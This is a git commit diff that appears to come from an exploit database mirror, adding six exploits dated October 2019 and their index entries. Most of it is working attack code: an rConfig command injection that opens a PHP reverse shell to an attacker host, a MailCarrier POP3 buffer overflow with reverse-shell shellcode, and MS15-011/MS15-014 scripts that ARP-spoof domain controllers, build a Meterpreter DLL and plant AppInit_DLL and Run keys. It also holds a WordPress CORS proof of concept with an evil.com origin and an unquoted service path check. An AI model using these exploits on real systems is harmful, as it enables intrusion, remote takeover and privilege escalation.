DB: 2019-10-30
6 changes to exploits/shellcodes Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass rConfig 3.9.2 - Remote Code Execution Wordpress 5.2.4 - Cross-Origin Resource Sharing
This commit is contained in:
parent
d4a236d578
commit
595ac97a33
7 changed files with 491 additions and 0 deletions
47
exploits/php/webapps/47555.py
Executable file
47
exploits/php/webapps/47555.py
Executable file
|
@ -0,0 +1,47 @@
|
|||
# Exploit Title: rConfig 3.9.2 - Remote Code Execution
|
||||
# Date: 2019-09-18
|
||||
# Exploit Author: Askar
|
||||
# Vendor Homepage: https://rconfig.com/
|
||||
# Software link: https://rconfig.com/download
|
||||
# Version: v3.9.2
|
||||
# Tested on: CentOS 7.7 / PHP 7.2.22
|
||||
# CVE : CVE-2019-16662
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
import requests
|
||||
import sys
|
||||
from urllib import quote
|
||||
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
||||
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
||||
|
||||
if len(sys.argv) != 4:
|
||||
print "[+] Usage : ./exploit.py target ip port"
|
||||
exit()
|
||||
|
||||
target = sys.argv[1]
|
||||
|
||||
ip = sys.argv[2]
|
||||
|
||||
port = sys.argv[3]
|
||||
|
||||
payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port))
|
||||
|
||||
install_path = target + "/install"
|
||||
|
||||
req = requests.get(install_path, verify=False)
|
||||
if req.status_code == 404:
|
||||
print "[-] Installation directory not found!"
|
||||
print "[-] Exploitation failed !"
|
||||
exit()
|
||||
elif req.status_code == 200:
|
||||
print "[+] Installation directory found!"
|
||||
url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload
|
||||
|
||||
print "[+] Triggering the payload"
|
||||
print "[+] Check your listener !"
|
||||
|
||||
requests.get(url_to_send, verify=False)
|
||||
|
||||
|
||||
rConfig-preauth.png
|
46
exploits/php/webapps/47557.txt
Normal file
46
exploits/php/webapps/47557.txt
Normal file
|
@ -0,0 +1,46 @@
|
|||
# Exploit Title: Wordpress 5.2.4 - Cross-Origin Resource Sharing
|
||||
# Date: 2019-10-28
|
||||
# Exploit Author: Milad Khoshdel
|
||||
# Software Link: https://wordpress.org/download/
|
||||
# Version: Wordpress 5.2.4
|
||||
# Tested on: Linux Apache/2 PHP/7.2
|
||||
|
||||
# Vulnerable Page:
|
||||
https://[Your-Domain]/wp-json
|
||||
|
||||
# POC:
|
||||
# The web application fails to properly validate the Origin header (check Details section for more information)
|
||||
# and returns the header Access-Control-Allow-Credentials: true. In this configuration any website can issue
|
||||
# requests made with user credentials and read the responses to these requests. Trusting arbitrary
|
||||
# origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites.
|
||||
|
||||
# REGUEST -->
|
||||
|
||||
GET /wp-json/ HTTP/1.1
|
||||
Origin: https://www.evil.com
|
||||
Accept: */*
|
||||
Accept-Encoding: gzip,deflate
|
||||
Host: [Your-Domain]
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
|
||||
Connection: Keep-alive
|
||||
|
||||
# RESPONSE -->
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 28 Oct 2019 07:34:39 GMT
|
||||
Server: NopeJS
|
||||
X-Robots-Tag: noindex
|
||||
Link: <https://[Your-Domain].com/wp-json/>; rel="https://api.w.org/"
|
||||
X-Content-Type-Options: nosniff
|
||||
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
|
||||
Access-Control-Allow-Headers: Authorization, Content-Type
|
||||
Allow: GET
|
||||
Access-Control-Allow-Origin: https://www.evil.com
|
||||
Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
|
||||
Access-Control-Allow-Credentials: true
|
||||
Vary: Origin,Accept-Encoding,User-Agent
|
||||
Keep-Alive: timeout=2, max=73
|
||||
Connection: Keep-Alive
|
||||
Content-Type: application/json; charset=UTF-8
|
||||
Original-Content-Encoding: gzip
|
||||
Content-Length: 158412
|
49
exploits/windows/local/47556.txt
Normal file
49
exploits/windows/local/47556.txt
Normal file
|
@ -0,0 +1,49 @@
|
|||
# Exploit Title: Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path
|
||||
# Discovery Date: 2019-10-28
|
||||
# Exploit Author: Alberto Vargas
|
||||
# Vendor Homepage: https://www.issivs.com/product-detail/secure-os-enterprise/
|
||||
# Software Link: https://www.issivs.com/schedule-a-free-demo/(trial version for unlicensed users)
|
||||
# Version: 10.2 R1
|
||||
# Tested on: Windows 10 Pro x64 Esp
|
||||
|
||||
# Version: 10.0.18362
|
||||
|
||||
# Schedule A Free Demo - ISS - Intelligent Security Systems<https://www.issivs.com/schedule-a-free-demo/>
|
||||
# Schedule a Free Demo A leading developer of security surveillance and control systems for
|
||||
# networked digital video and audio recording, video image pattern processing and digital data transmission.
|
||||
# www.issivs.com
|
||||
|
||||
# Summary: ISS’ global standard for video management, access control and video analytics, SecurOS™ Enterprise is perfectly suited for
|
||||
# managing large and demanding installations. The Enterprise framework can manage and monitor an unlimited number of cameras and devices, apply
|
||||
# intelligent video analytics, and act as an integration platform for a variety of 3rd party systems. Built to handle enterprise level deployments,
|
||||
# SecurOS Enterprise, comes with built-in Native Failure functionality, Microsoft Active Directory / LDAP integration, and has an extensive set
|
||||
# of Cybersecurity features making it one of the most reliable and secure video management platforms in the market today. SecurOS Enterprise
|
||||
# supports all the features of the other 3 editions.
|
||||
|
||||
# Description: The application suffers from an unquoted search path issue impacting the service 'SecurosCtrlService'. This could potentially allow an
|
||||
# authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require
|
||||
# the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could
|
||||
# potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
|
||||
# of the application.
|
||||
|
||||
# Step to discover the unquoted Service:
|
||||
|
||||
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
|
||||
|
||||
SecurOS Control Service SecurosCtrlService C:\Program Files (x86)\ISS\SecurOS\securos_svc.exe Auto
|
||||
|
||||
# Service info:
|
||||
|
||||
C:\Users\user>sc qc SecurosCtrlService
|
||||
[SC] QueryServiceConfig CORRECTO
|
||||
|
||||
NOMBRE_SERVICIO: SecurosCtrlService
|
||||
TIPO : 10 WIN32_OWN_PROCESS
|
||||
TIPO_INICIO : 2 AUTO_START
|
||||
CONTROL_ERROR : 1 NORMAL
|
||||
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ISS\SecurOS\securos_svc.exe
|
||||
GRUPO_ORDEN_CARGA :
|
||||
ETIQUETA : 0
|
||||
NOMBRE_MOSTRAR : SecurOS Control Service
|
||||
DEPENDENCIAS :
|
||||
NOMBRE_INICIO_SERVICIO: LocalSystem
|
66
exploits/windows/remote/47554.py
Executable file
66
exploits/windows/remote/47554.py
Executable file
|
@ -0,0 +1,66 @@
|
|||
# Exploit Title: Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow
|
||||
# Date: 2019-10-01
|
||||
# Author: Lance Biggerstaff
|
||||
# Original Exploit Author: Dino Covotsos - Telspace Systems
|
||||
# Vendor Homepage: https://www.tabslab.com/
|
||||
# Version: 2.51
|
||||
# Tested on: Windows 10
|
||||
# Note: Every version of Windows 10 has a different offset ¯\_(ツ)_/¯
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
import sys
|
||||
import socket
|
||||
import time
|
||||
|
||||
#msfvenom -p windows/shell/reverse_tcp lhost=IP_ADDRESS lport=LISYTENING_PORT -b '\x00\xd9' -f python
|
||||
|
||||
buf = ""
|
||||
buf += "\x2b\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81"
|
||||
buf += "\x76\x0e\xe7\xb4\xfe\x5c\x83\xee\xfc\xe2\xf4\x1b\x5c"
|
||||
buf += "\x7c\x5c\xe7\xb4\x9e\xd5\x02\x85\x3e\x38\x6c\xe4\xce"
|
||||
buf += "\xd7\xb5\xb8\x75\x0e\xf3\x3f\x8c\x74\xe8\x03\xb4\x7a"
|
||||
buf += "\xd6\x4b\x52\x60\x86\xc8\xfc\x70\xc7\x75\x31\x51\xe6"
|
||||
buf += "\x73\x1c\xae\xb5\xe3\x75\x0e\xf7\x3f\xb4\x60\x6c\xf8"
|
||||
buf += "\xef\x24\x04\xfc\xff\x8d\xb6\x3f\xa7\x7c\xe6\x67\x75"
|
||||
buf += "\x15\xff\x57\xc4\x15\x6c\x80\x75\x5d\x31\x85\x01\xf0"
|
||||
buf += "\x26\x7b\xf3\x5d\x20\x8c\x1e\x29\x11\xb7\x83\xa4\xdc"
|
||||
buf += "\xc9\xda\x29\x03\xec\x75\x04\xc3\xb5\x2d\x3a\x6c\xb8"
|
||||
buf += "\xb5\xd7\xbf\xa8\xff\x8f\x6c\xb0\x75\x5d\x37\x3d\xba"
|
||||
buf += "\x78\xc3\xef\xa5\x3d\xbe\xee\xaf\xa3\x07\xeb\xa1\x06"
|
||||
buf += "\x6c\xa6\x15\xd1\xba\xdc\xcd\x6e\xe7\xb4\x96\x2b\x94"
|
||||
buf += "\x86\xa1\x08\x8f\xf8\x89\x7a\xe0\x3d\x16\xa3\x37\x0c"
|
||||
buf += "\x6e\x5d\xe7\xb4\xd7\x98\xb3\xe4\x96\x75\x67\xdf\xfe"
|
||||
buf += "\xa3\x32\xde\xf4\x34\x27\x1c\xec\x59\x8f\xb6\xfe\x5c"
|
||||
buf += "\xf2\x3d\x18\x0c\xb7\xe4\xae\x1c\xb7\xf4\xae\x34\x0d"
|
||||
buf += "\xbb\x21\xbc\x18\x61\x69\x36\xf7\xe2\xa9\x34\x7e\x11"
|
||||
buf += "\x8a\x3d\x18\x61\x7b\x9c\x93\xbe\x01\x12\xef\xc1\x12"
|
||||
buf += "\xb4\x80\xb4\xfe\x5c\x8d\xb4\x94\x58\xb1\xe3\x96\x5e"
|
||||
buf += "\x3e\x7c\xa1\xa3\x32\x37\x06\x5c\x99\x82\x75\x6a\x8d"
|
||||
buf += "\xf4\x96\x5c\xf7\xb4\xfe\x0a\x8d\xb4\x96\x04\x43\xe7"
|
||||
buf += "\x1b\xa3\x32\x27\xad\x36\xe7\xe2\xad\x0b\x8f\xb6\x27"
|
||||
buf += "\x94\xb8\x4b\x2b\xdf\x1f\xb4\x83\x74\xbf\xdc\xfe\x1c"
|
||||
buf += "\xe7\xb4\x94\x5c\xb7\xdc\xf5\x73\xe8\x84\x01\x89\xb0"
|
||||
buf += "\xdc\x8b\x32\xaa\xd5\x01\x89\xb9\xea\x01\x50\xc3\xbb"
|
||||
buf += "\x7b\x2c\x18\x4b\x01\xb5\x7c\x4b\x01\xa3\xe6\x77\xd7"
|
||||
buf += "\x9a\x92\x75\x3d\xe7\x17\x01\x5c\x0a\x8d\xb4\xad\xa3"
|
||||
buf += "\x32\xb4\xfe\x5c"
|
||||
|
||||
jmpesp = '\x23\x49\xA1\x0F'
|
||||
|
||||
#buffer = '\x41' * 5093 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
|
||||
#buffer = '\x41' * 5093 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
|
||||
buffer = '\x41' * 5095 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
|
||||
#buffer = '\x41' * 5097 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
|
||||
#buffer = '\x41' * 5099 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
|
||||
|
||||
print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
connect=s.connect(("192.168.121.87", 110))
|
||||
print s.recv(1024)
|
||||
s.send('USER ' + buffer + '\r\n')
|
||||
print s.recv(1024)
|
||||
s.send('QUIT\r\n')
|
||||
s.close()
|
||||
time.sleep(1)
|
||||
print "[*] Done, but if you get here the exploit failed!"
|
152
exploits/windows/remote/47558.py
Executable file
152
exploits/windows/remote/47558.py
Executable file
|
@ -0,0 +1,152 @@
|
|||
# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution
|
||||
# Date: 2019-10-28
|
||||
# Exploit Author: Thomas Zuk
|
||||
# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012,
|
||||
# Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
|
||||
# Tested on: Windows 7 , Windows Server 2012
|
||||
# CVE : CVE-2015-0008
|
||||
# Type: Remote
|
||||
# Platform: Windows
|
||||
|
||||
# Description: While there exists multiple advisories for the vulnerability and video demos of
|
||||
# successful exploitation there is no public exploit-code for MS15-011 (CVE-2015-0008). This exploit code
|
||||
# targets vulnerable systems in order to modify registry keys to disable SMB signing, achieve SYSTEM level
|
||||
# remote code execution (AppInit_DLL) and a user level remote code execution (Run Keys).
|
||||
|
||||
#!/usr/bin/python3
|
||||
|
||||
import argparse
|
||||
import os
|
||||
import subprocess
|
||||
import socket
|
||||
import fcntl
|
||||
import struct
|
||||
|
||||
# MS15-011 Exploit.
|
||||
# For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-011
|
||||
# Example usage: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
|
||||
# Example usage with multiple DC's: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
|
||||
# Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy.
|
||||
|
||||
def arpSpoof(interface, hostIP, targetIP):
|
||||
arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP)
|
||||
arpArgs = arpCmd.split()
|
||||
print("Arpspoofing: %s" % (arpArgs))
|
||||
p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
|
||||
|
||||
|
||||
def karmaSMB(hostIP):
|
||||
print("reverting GptTmpl.inf from bak")
|
||||
os.system("cp GptTmpl.inf.bak GptTmpl.inf")
|
||||
appInit = 'MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs=1,"\\\\%s\\SYSVOL\\share.dll"\r\n' % (hostIP)
|
||||
CURunKey = 'MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Key=1,"rundll32.exe \\\\%s\\SYSVOL\\share.dll",1\r\n' % (hostIP)
|
||||
f = open("GptTmpl.inf","a", encoding='utf-16le')
|
||||
f.write(appInit)
|
||||
f.write(CURunKey)
|
||||
f.close()
|
||||
|
||||
path = os.getcwd()
|
||||
|
||||
fConfig = open("smb.conf","w")
|
||||
fConfig.write("ini = "+path+"/gpt.ini\ninf = "+path+"/GptTmpl.inf\ndll = "+path+"/shell.dll\n")
|
||||
fConfig.close()
|
||||
|
||||
karmaCmd = "python karmaSMB.py -config smb.conf -smb2support ./ "
|
||||
os.system(karmaCmd)
|
||||
|
||||
|
||||
def iptables_config(targetIP, hostIP):
|
||||
print('[+] Running command: echo "1" > /proc/sys/net/ipv4/ip_forward')
|
||||
print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
|
||||
print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
|
||||
print('[+] Running command: iptables -t nat -A POSTROUTING -j MASQUERADE')
|
||||
os.system('echo "1" > /proc/sys/net/ipv4/ip_forward')
|
||||
os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
|
||||
os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
|
||||
os.system('iptables -t nat -A POSTROUTING -j MASQUERADE')
|
||||
|
||||
|
||||
def get_interface_address(ifname):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24])
|
||||
|
||||
def generatePayload(lhost, lport):
|
||||
print("generating payload(s) and metasploit resource file")
|
||||
msfDll = "msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=%s lport=%s -f dll -o shell.dll" % (lhost, lport)
|
||||
os.system(msfDll)
|
||||
msfResource = "use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lhost %s\nset lport %s\nset exitonsession false\nexploit -j\n" % (lhost, lport)
|
||||
print("metasploit resource script: %s" % msfResource)
|
||||
print ("metasploit resource script written to meta_resource.rc type 'msfconsole -r meta_resource.rc' to launch metasploit and stage a listener automatically")
|
||||
|
||||
file = open("meta_resource.rc", "w+")
|
||||
file.write(msfResource)
|
||||
file.close()
|
||||
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
parser = argparse.ArgumentParser()
|
||||
|
||||
# Add arguments
|
||||
parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-011/14", required=True)
|
||||
parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller(s) in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True)
|
||||
parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True)
|
||||
parser.add_argument("-l", "--lhost", help="The IP to listen for incoming connections on for reverse shell. This is optional, uses the IP from the provided interface by default. E.G 192.168.5.1", required=False)
|
||||
parser.add_argument("-p", "--lport", help="The port to listen connections on for reverse shell. If not specified 4444 is used. E.G 443", required=False)
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
# Check for KarmaSMB and GptTmpl.inf.bak, if missing download git repo with these files.
|
||||
print ("checking for missing file(s)")
|
||||
if not os.path.isfile("karmaSMB.py") and not os.path.isfile("GptTmpl.inf.bak"):
|
||||
print("Requirements missing. Downloading required files from github")
|
||||
os.system("git clone https://github.com/Freakazoidile/MS15-011-Files")
|
||||
os.system("mv MS15-011-Files/* . && rm -rf MS15-011-Files/")
|
||||
|
||||
# Get the provided interfaces IP address
|
||||
ipAddr = get_interface_address(args.interface)
|
||||
|
||||
if args.lhost is not None:
|
||||
lhost = args.lhost
|
||||
else:
|
||||
lhost = ipAddr
|
||||
|
||||
if args.lport is not None:
|
||||
lport = args.lport
|
||||
else:
|
||||
lport = '4444'
|
||||
|
||||
|
||||
dcSpoof = ""
|
||||
dcCommaList = ""
|
||||
count = 0
|
||||
|
||||
# loop over the domain controllers, poison each and target the host IP
|
||||
# create a comma separated list of DC's
|
||||
# create a "-t" separate list of DC's for use with arpspoof
|
||||
for dc in args.domain_controller:
|
||||
dcSpoof += "-t %s " % (dc)
|
||||
if count > 0:
|
||||
dcCommaList += ",%s" % (dc)
|
||||
else:
|
||||
dcCommaList += "%s" % (dc)
|
||||
|
||||
arpSpoof(args.interface, dc, "-t %s" % (args.target_ip))
|
||||
count += 1
|
||||
|
||||
# arpspoof the target and all of the DC's
|
||||
arpSpoof(args.interface, args.target_ip, dcSpoof)
|
||||
|
||||
# generate payloads
|
||||
generatePayload(lhost, lport)
|
||||
|
||||
# Setup iptables forwarding rules
|
||||
iptables_config(args.target_ip, ipAddr)
|
||||
|
||||
#run Karmba SMB Server
|
||||
karmaSMB(ipAddr)
|
||||
|
||||
|
||||
print("Targeting %s by arp spoofing %s and domain controllers: %s " % (args.target_ip, args.target_ip, args.domain_controllers))
|
||||
print("If you interupt/stop the exploit ensure you stop all instances of arpspoof and flush firewall rules!")
|
125
exploits/windows/remote/47559.py
Executable file
125
exploits/windows/remote/47559.py
Executable file
|
@ -0,0 +1,125 @@
|
|||
# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass
|
||||
# Date: 2019-10-28
|
||||
# Exploit Author: Thomas Zuk
|
||||
# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2,
|
||||
# Windows 8, Windows Server 2012, Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
|
||||
# Tested on: Windows 7 , Windows Server 2012
|
||||
# CVE : CVE-2015-0009
|
||||
# Type: Remote
|
||||
# Platform: Windows
|
||||
|
||||
# Description: This exploit code targets vulnerable systems in order to corrupt GPO updates which causes
|
||||
# the target system to revert various security settings to their default settings. This includes SMB server
|
||||
# and network client settings, which by default do not require SMB signing except for domain controllers.
|
||||
# Successful exploitation against a system with a hardened configuration that requires SMB Signing by the
|
||||
# network client will make the target system vulnerable to MS15-011, which can lead to remote code execution.
|
||||
|
||||
#!/usr/bin/python3
|
||||
|
||||
import argparse
|
||||
import fcntl
|
||||
import os
|
||||
import socket
|
||||
import struct
|
||||
import subprocess
|
||||
from subprocess import PIPE
|
||||
import re
|
||||
|
||||
# MS15-014 Exploit.
|
||||
# For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-014
|
||||
# Example usage: python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
|
||||
# Example usage with multiple DC's: python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
|
||||
# Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy.
|
||||
|
||||
def arpSpoof(interface, hostIP, targetIP):
|
||||
arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP)
|
||||
arpArgs = arpCmd.split()
|
||||
print("Arpspoofing: %s" % (arpArgs))
|
||||
p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
|
||||
|
||||
|
||||
def corrupt_packet():
|
||||
global count
|
||||
|
||||
# NetSed listen port 446 (iptables redirected), modify traffic, then forward to destination 445.
|
||||
netsedCmd = "netsed tcp 446 0 445 s/%00%5c%00%4d%00%61%00%63%00%68%00%69%00%6e%00%65%00%5c%00%4d%00%69%00%63%00%72%00%6f%00%73%00%6f%00%66%00%74%00%5c%00%57%00%69%00%6e%00%64%00%6f%00%77%00%73%00%20%00%4e%00%54%00%5c%00%53%00%65%00%63%00%45%00%64%00%69%00%74%00%5c%00%47%00%70%00%74%00%54%00%6d%00%70%00%6c%00%2e%00%69%00%6e%00%66%00/%00%5c%00%4d%00%61%00%63%00%68%00%69%00%6e%00%65%00%5c%00%4d%00%69%00%63%00%72%00%6f%00%73%00%6f%00%66%00%74%00%5c%00%57%00%69%00%6e%00%64%00%6f%00%77%00%73%00%20%00%4e%00%54%00%5c%00%53%00%65%00%63%00%45%00%64%00%69%00%74%00%5c%00%47%00%70%00%74%00%54%00%6d%00%70%00%6c%00%2e%00%69%00%6e%00%66%00%00" #>/dev/null 2>&1 &
|
||||
netsedArgs = netsedCmd.split()
|
||||
print("Starting NetSed!")
|
||||
print("NetSed: %s" % (netsedArgs))
|
||||
netsedP = subprocess.Popen(netsedArgs, stdout=PIPE, stderr=subprocess.STDOUT)
|
||||
|
||||
|
||||
while True:
|
||||
o = (netsedP.stdout.readline()).decode('utf-8')
|
||||
|
||||
if o != '':
|
||||
if args['verbose']:
|
||||
print("NetSed output: %s" % o)
|
||||
|
||||
if re.search('Applying rule', o) is not None:
|
||||
count += 1
|
||||
print('packet corrupted: % s' % count)
|
||||
# During testing, after 4 attempts to retrieve GptTmpl.inf the exploit was successful. Sometimes the machine requested the file 7 times, but exploitation was always successful after 4 attempts.
|
||||
# The script waits for up to 7 for reliability. Tested on Windows 7 SP1 and Server 2012 R2
|
||||
if count == 4:
|
||||
print("Exploit has likely completed!! waiting for up to 7 corrupted packets for reliability. \nIf no more packets are corrupted in the next couple of minutes kill this script. The target should be reverted to default settings with SMB signing not required on the client. \nTarget can now be exploited with MS15-011 exploit.")
|
||||
|
||||
#During testing, after 7 attempts to retrieve GptTmpl.inf the GPO update stopped and exploitation was successful.
|
||||
if count == 7:
|
||||
break
|
||||
|
||||
|
||||
def get_interface_address(ifname):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24])
|
||||
|
||||
def iptables_config(targetIP, hostIP):
|
||||
#allow forwarding, redirect arpspoofed traffic from dport 445 to 446 for NetSed.
|
||||
print('[+] Running command: echo "1" > /proc/sys/net/ipv4/ip_forward')
|
||||
print('[+] Running command: iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-port 446')
|
||||
print('[+] Make sure to cleanup iptables after exploit completes')
|
||||
os.system('echo "1" > /proc/sys/net/ipv4/ip_forward')
|
||||
os.system('iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-port 446')
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
parser = argparse.ArgumentParser(description='Find the SecEdit\GptTmpl.inf UUID to exploit MS15-014')
|
||||
parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-014", required=True)
|
||||
parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True)
|
||||
parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True)
|
||||
parser.add_argument("-v", "--verbose", help="Toggle verbose mode. displays all output of NetSed, very busy terminal if enabled.", action='store_true')
|
||||
|
||||
args = vars(parser.parse_args())
|
||||
|
||||
target_ip = args['target_ip']
|
||||
|
||||
count = 0
|
||||
|
||||
# Get the provided interfaces IP address
|
||||
ipAddr = get_interface_address(args['interface'])
|
||||
|
||||
dcSpoof = ""
|
||||
dcCommaList = ""
|
||||
dcCount = 0
|
||||
|
||||
# loop over the domain controllers, poison each and target the host IP
|
||||
# create a comma separated list of DC's
|
||||
# create a "-t" separate list of DC's for use with arpspoof
|
||||
for dc in args['domain_controller']:
|
||||
dcSpoof += "-t %s " % (dc)
|
||||
if dcCount > 0:
|
||||
dcCommaList += ",%s" % (dc)
|
||||
else:
|
||||
dcCommaList += "%s" % (dc)
|
||||
|
||||
arpSpoof(args['interface'], dc, "-t %s" % (target_ip))
|
||||
dcCount += 1
|
||||
|
||||
# arpspoof the target and all of the DC's
|
||||
arpSpoof(args['interface'], target_ip, dcSpoof)
|
||||
|
||||
# Setup iptables forwarding rules
|
||||
iptables_config(target_ip, ipAddr)
|
||||
|
||||
#identify requests for GptTmpl.inf and modify the packet to corrupt it using NetSed.
|
||||
corrupt_packet()
|
|
@ -10736,6 +10736,7 @@ id,file,description,date,author,type,platform,port
|
|||
47543,exploits/linux/local/47543.rb,"Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)",2019-10-24,Metasploit,local,linux,
|
||||
47549,exploits/windows/local/47549.txt,"JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path",2019-10-28,"Roberto Escamilla",local,windows,
|
||||
47551,exploits/windows/local/47551.py,"ChaosPro 2.0 - Buffer Overflow (SEH)",2019-10-28,SYANiDE,local,windows,
|
||||
47556,exploits/windows/local/47556.txt,"Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path",2019-10-29,"Alberto Vargas",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -17738,6 +17739,9 @@ id,file,description,date,author,type,platform,port
|
|||
47519,exploits/windows/remote/47519.py,"ThinVNC 1.0b1 - Authentication Bypass",2019-10-17,"Nikhith Tumamlapalli",remote,windows,
|
||||
47531,exploits/multiple/remote/47531.rb,"Total.js CMS 12 - Widget JavaScript Code Injection (Metasploit)",2019-10-22,Metasploit,remote,multiple,
|
||||
47536,exploits/hardware/remote/47536.txt,"Moxa EDR-810 - Command Injection / Information Disclosure",2019-10-22,RandoriSec,remote,hardware,
|
||||
47554,exploits/windows/remote/47554.py,"Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow",2019-10-29,"Lance Biggerstaff",remote,windows,
|
||||
47558,exploits/windows/remote/47558.py,"Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution",2019-10-29,"Thomas Zuk",remote,windows,
|
||||
47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass",2019-10-29,"Thomas Zuk",remote,windows,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
